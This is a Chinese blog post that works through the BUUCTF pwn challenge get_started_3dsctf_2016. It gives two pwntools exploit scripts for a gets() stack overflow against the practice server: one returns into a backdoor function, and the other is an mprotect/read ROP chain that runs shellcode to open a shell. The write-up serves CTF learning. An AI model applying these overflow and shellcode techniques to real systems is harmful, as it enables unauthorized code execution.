buuctf pwn12

已于 2023-11-23 11:50:04 修改
阅读量35 收藏
点赞数
文章标签: 网络安全
于 2023-10-28 11:27:06 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_74861133/article/details/134087823
版权

get_started_3dsctf_2016 1

1.checksec

在这里插入图片描述

2.ida

在这里插入图片描述
gets(v4)存在栈溢出漏洞,可以利用
在这里插入图片描述
在紧挨着main函数上面发现疑似后门函数,点进去查看
发现只要满足条件a1 == 814536271 && a2 == 425138641就能启用后门函数,记住后门函数的地址0x80489A0
a1和a2是函数参数,我们可以进行传入,同时为了让get_flag正常结束,我们要使其返回函数为exit()
在这里插入图片描述
终于找到了exit()的起始地址为0x0804E6A0

故exp如下:

from pwn import*
p=remote('node4.buuoj.cn',25786)
context.log_level='debug'
payload=b'a'*0x38+p32(0x80489A0)+p32(0x804E6A0)+p32(814536271)+p32(425138641)
p.sendline(payload)
p.recv()

这里context.log_level='debug’别删,不然看不到flag,或者将recv()改为print(recv())也可以直接输出接收到的flag
运行得到flag
在这里插入图片描述

方法2

需要知道mprotect函数。这个函数就是用来修改内存权限的函数。

有3个参数,第一个参数就是需修改权限的起始地址,第二个参数是修改内存长度,第三个参数是权限,比如说0x7 = 111(二进制)就是可读可写可执行。

因此我们的思路大概就是先利用溢出漏洞,将返回地址改成mprotect函数的地址,接着改变某一内存区域的权限,想办法向这一内存区域中写入shellcode,然后执行即可。

写入函数,通过idea可以发现有read函数。
我们为了保持控制流,可以利用寄存器传参。

可以利用ropgadget来进行搜索相应寄存器
ROPgadget --binary pwn12 --only ‘pop|ret’|grep ’pop‘
在这里插入图片描述
这里用的0x080509a5作为mprotext的返回地址

exp

from pwn import*
p=remote('node4.buuoj.cn',25867)
elf=ELF('./pwn12')
pop_ret=0x080509a5
start_addr=0x080ea000
mpro_addr=elf.sym['mprotect']
read_addr=elf.sym['read']
main_addr=elf.sym['main']
payload=b'a'*(0x38)+p32(mpro_addr)+p32(pop_ret)+p32(start_addr)+p32(0x1000)+p32(7)
payload+=p32(read_addr)+p32(start_addr)+p32(0)+p32(start_addr)+p32(200)#read_addr后的start_addr为read的返回地址目的是为了read函数返回后能够执行该处的shellcode
p.sendline(payload)
payload=asm(shellcraft.sh())
p.sendline(payload)
p.interactive()
曾经满眼皆是她
关注
BUUCTF PWN rip1 WP
m0_54262894的博客
07-31 2583
BUUCTF PWN rip 1 这是一个WP,也是一个自己练习过程的记录。 先把文件放入pwn机中检查一下,发现并没有开启保护,所以应该是一道简单题 我们运行一下试试,它让你输入一段字符然后将字符输出。 把文件放在ida中查看一下 发现main函数并不复杂,只是定义了一个 s ,而且我们很容易就能找到栈溢出的点,我们都知道gets函数是一个危险函数,对于我们来说它可以接受到无限的字符,所以这里就是我们要pwn掉的点。 我们双击 s ,看它有多少空...
buuctf pwn解题
2301_80477504的博客
02-01 522
1.
BUUCTF PWN-RIP详解
weixin_43780092的博客
09-07 5187
BUU CTF PWN 入门知识详解
BUUCTF PWN(2)
qq_60794823的博客
09-28 243
首先先用checksec查看开启了什么保护可以看到只开启了NX保护,即堆栈不可执行用32位的IDA打开附件,shift+f12查看字串打开main函数查看vuln函数,发现存在栈溢出漏洞的函数,**fgets(s, 32, edata)**这里对gets作出了限制,32(0x20)而s的大小0x3c>0x20所以不能造成溢出。这道题就不能解决了吗,结果肯定不是这样的仔细查看C代码可以发现,函数实现了字符串替换,将I替换为you,并将结果重组赋值给s。
buuctf pwn入门1
weixin_63231007的博客
07-07 1378
buuctf pwn 前几道简单栈溢出&格式化字符串漏洞
BUUCTF Pwn pwn1_sctf_2016
MrTreebook的博客
12-05 1319
BUUCTF Pwn pwn1_sctf_20161.题目下载地址2.checksec检查保护3.IDA分析4.看一下栈大小5.找到后门函数地址6.exp 1.题目下载地址 点击下载题目 2.checksec检查保护 运行一下看看 3.IDA分析 看一下伪代码 int vuln() { const char *v0; // eax char s[32]; // [esp+1Ch] [ebp-3Ch] BYREF char v3[4]; // [esp+3Ch] [ebp-1Ch] BYREF
BUUCTF pwn
L0g1c的博客
01-30 1679
第一道: 第一步:连接nc靶场 第二步:连接靶场后,执行 ls 命令,展示该靶场下目录文件。 第三步:里有个 flag文件 使用 cat命令进行查看。 得到flag
BUUCTF PWN(1)
qq_60794823的博客
09-27 1045
首先checksec起手发现没有打开任何防护,是64位amd文件,使用IDA反汇编瞅一瞅首先shift+f12查看字串发现/bin/sh和system跟进查看/bin/sh的返回地址查看main函数的反编译代码发现**gets(s, argv)**栈溢出漏洞,没有限制s的输入大小点开s查看s的内存大小发现距离返回地址为0XF+0X8构造payload:‘a’ * 0x23 + p64(0x401186)发现连接超时。
BUUCTF pwn——pwn2_sctf_2016
CNS-Enterprise BCC-1701-J
04-18 359
BUUCTF 做题练习
buuctf pwn ubuntu20的自己搭建运行环境
11-15
pwn ubuntu20的自己搭建运行环境具体情参考https://blog.csdn.net/weixin_41748164/article/details/127874334
BUUCTF PWN-堆题总结 2021-09-27
m0_56897090的博客
09-27 2092
文章目录整体分析-2021-09-27新角度TcacheUAFFile结构体HourseOfForceUnlink经验新角度ciscn_2019_final_5分析EXPTCACHEhitcon_2018_children_tcache分析EXPUAFwustctf2020_easyfast分析EXPACTF_2019_babyheap分析EXPgyctf_2020_some_thing_interesting分析EXPbjdctf_2020_YDSneedGrirlfrien分析EXPciscn_2019
BUUCTF pwn rip
weixin_55190422的博客
11-03 341
现在开始是记录我个人对BUU上PWN题的刷题记录。 首先是一个ELF文件,放到Linux里面来看。 首先老套路checksec一下 接着我们将这个文件放到IDA中静态分析、 shift F12 一下看看敏感字段 我们发现里面有个系统调用函数。我们查看下汇编代码 我们查看Stack of main 视图发现只要存入15个字节就可以返回fun函数 所以payload: from pwn import * p = remote('node4.buuoj.cn',...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8489
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
基于龙伯格(Luenberger)观测器的无感FOC电机矢量控制MATLAB Simulink仿真模型
10-06
基于龙伯格(Luenberger)观测器的无感FOC电机矢量控制MATLAB Simulink仿真模型 通过龙伯格观测器,我们可以在不直接测量转子角度的情况下,通过已知的电机电流、电压来估算转子角度。这种方法在控制理论和实际电机控制中具有广泛的应用,尤其是在无传感器的情况下。
web端实现《别踩白块》小游戏
10-06
通过JS实现web的《别踩白块》小游戏
python经典实例代码汇总+100例
最新发布
10-06
python经典实例代码汇总+100例
阵列天线泰勒综合法降低副瓣电平的matlab源代码
10-06
clear clc % 参数设置 Freq =30*(1e9); %频率 v_0=3*10^8;%光速 lamda = v_0/Freq ; % 波长 d = lamda * 0.6; % d为阵元间距 theta0 = (90/180)*pi; % 扫描角度 theta = 0: 0.01 : pi; % Θ为方向角 u = pi*d*(cos(theta)-cos(theta0))/lamda; %T = Chebyshev; % T为切比雪夫恒等式系数矩阵 N = 16; % N为直线阵的阵元数量,M为一侧的单元数(对称) R0dB = 20; % R0dB为副瓣电平 nbar=9; %相等电平副瓣数目 if (mod(N,2)==0) M = N / 2; parity = 0; % parity为奇偶性,0为偶数
Delphi 开发资源汇总及组件介绍
10-06
内容概要:本文档提供了一个归档快照,展示了一个精心策划的Delphi优秀框架、库与各种资源列表。其中包括大量通用库如JCL、JVCL、Spring4D以及Alcinoe等,针对多媒体(如音频视频)、网络通信工具集(如Indy、Synapse)以及界面控制包等多个模块的具体介绍。另外还涉及到脚本引擎(如DWScript)、内存管理、日志记录、加密解密技术等多项实用性组件及实用工具。此外它还有针对性地罗列了关于数据库连接库(例如ZeosLib、mORMot),单元测试库(像DUnitX,DUnit2等),以及各类IDE插件增强工具的细节描述。 适合人群:Delphi程序员及其开发者。 使用场景及目标:作为查找和选择适用于不同软件项目的Delphi第三方库、组件及其他辅助工具的参考书,为Delphi开发人员提高工作效率和扩展程序功能提供了有力的支持。 其他说明:该资料侧重于开源项目,且对已过时多年的旧工程保持较低的关注度。所有的进展和改进都会在其活跃维护的新版本Awesome-Pascal清单上进行。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值